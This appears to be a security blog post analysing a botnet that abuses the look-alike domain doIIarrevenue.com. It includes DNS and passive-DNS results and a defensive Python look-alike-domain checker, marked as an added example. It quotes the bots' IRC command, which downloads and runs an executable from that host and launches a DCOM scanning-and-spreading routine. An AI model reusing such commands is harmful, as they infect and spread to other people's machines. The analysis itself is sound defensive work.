doIIarrevenue.com

Vitalsecurity.org has an interesting article entitled "Beware of DoiiarRevenue.com: Mimicking an Adware vendor for fun and profit". Some time ago I also stumbled across this domain while tracking a botnet with the following topic, which is executed by all bots joining the command channel:
:.t kill all |.db http://promo.doIIarrevenue.com/webmasterexe/drsmartload195a.exe 
c:\drsmartload195a.exe r |.advscan dcom135 100 3 0 -b -r

Instead of the usual promo.dollarrevenue.com link to a drsmartload.exe file, this botnet uses the doiiarrevenue.com site (capital I instead of lowercase l, which look identical in many fonts):
$ host dollarrevenue.com
dollarrevenue.com has address 194.187.45.56
dollarrevenue.com mail is handled by 10 MAIL.dollarrevenue.com.

$ host doiiarrevenue.com
doiiarrevenue.com has address 68.142.212.122
doiiarrevenue.com has address 68.142.212.117
doiiarrevenue.com has address 68.142.212.118
doiiarrevenue.com has address 68.142.212.119
doiiarrevenue.com has address 68.142.212.120
doiiarrevenue.com has address 68.142.212.121
doiiarrevenue.com mail is handled by 20 mx1.biz.mail.yahoo.com.
doiiarrevenue.com mail is handled by 30 mx5.biz.mail.yahoo.com.
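As an added example (not code from the original post), here is a small Python check a defender can run over hostnames from DNS or proxy logs: it merges look-alike characters (I, i and 1 for l; 0 for o) into a "skeleton" and flags any registered domain that collapses to the same skeleton as a watched brand but is not the brand itself. The confusable table, the helper names and the sample hostnames are my own assumptions; the channel topic is the one quoted above.

```python
import re

# Characters that read alike in many fonts. Lower-case l, capital I and
# the digit 1 are the ones abused by doIIarrevenue.com; the others are
# common typosquat swaps (constructed list, not exhaustive).
CONFUSABLES = {"i": "l", "1": "l", "|": "l", "0": "o", "rn": "m", "vv": "w"}

def skeleton(label):
    """Merge look-alike characters so dollarrevenue and doiiarrevenue
    collapse to the same string."""
    s = label.lower()
    for src, dst in CONFUSABLES.items():
        s = s.replace(src, dst)
    return s

def registered_domain(hostname):
    """Return the last two labels (promo.x.com -> x.com). Adequate for
    .com/.org names; not public-suffix-list aware."""
    parts = hostname.lower().strip(".").split(".")
    return ".".join(parts[-2:])

def hosts_from_irc_topic(topic):
    """Pull the hostnames of http(s) URLs out of a channel topic, dropping
    any :port suffix."""
    return [re.sub(r":\d+$", "", h) for h in re.findall(r"https?://([^/\s]+)", topic)]

def find_lookalikes(hostnames, brands):
    """Return (hostname, brand) pairs whose registered domain is not the
    brand itself but has the same skeleton as the brand's label."""
    brand_skel = {b: skeleton(b.split(".")[0]) for b in brands}
    hits = []
    for h in hostnames:
        dom = registered_domain(h)
        for brand, bs in brand_skel.items():
            if dom != brand and skeleton(dom.split(".")[0]) == bs:
                hits.append((h, brand))
    return hits

# Constructed sample input: the channel topic quoted in the post plus two
# benign hostnames as they might appear in a DNS log.
SAMPLE_TOPIC = (".t kill all |.db http://promo.doIIarrevenue.com/webmasterexe/"
                "drsmartload195a.exe c:\\drsmartload195a.exe r |.advscan dcom135 100 3 0 -b -r")
SAMPLE_HOSTS = ["www.dollarrevenue.com", "mail.example.org"] + hosts_from_irc_topic(SAMPLE_TOPIC)

if __name__ == "__main__":
    for host, brand in find_lookalikes(SAMPLE_HOSTS, ["dollarrevenue.com"]):
        print(f"{host} looks like {brand}")
```

The same skeleton comparison works for any brand list; the host being the legitimate domain itself (www.dollarrevenue.com) is deliberately not reported.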


Via the passive DNS replication service of RUS CERT it is quite obvious that these IPs are also used for other purposes:

The server returned the following data:

xoindustries.ca A 68.142.212.122
norja.cc A 68.142.212.122
prsindia.org A 68.142.212.122
boc.org A 68.142.212.122
iaftd.org A 68.142.212.122
auspiciouscoincidence.org A 68.142.212.122
investforlife.org A 68.142.212.122
missmaine.org A 68.142.212.122
nypdblue.org A 68.142.212.122
rovang.org A 68.142.212.122
artfulexpression.org A 68.142.212.122
fbcindep.org A 68.142.212.122
a-family-affair.org A 68.142.212.122
[...]


So, what is going on here? The only thing I can say currently is that doiiarrevenue.com also hosts a file called vv663.exe, which is clearly malicious as the CWSandbox analysis shows (report in XML format).
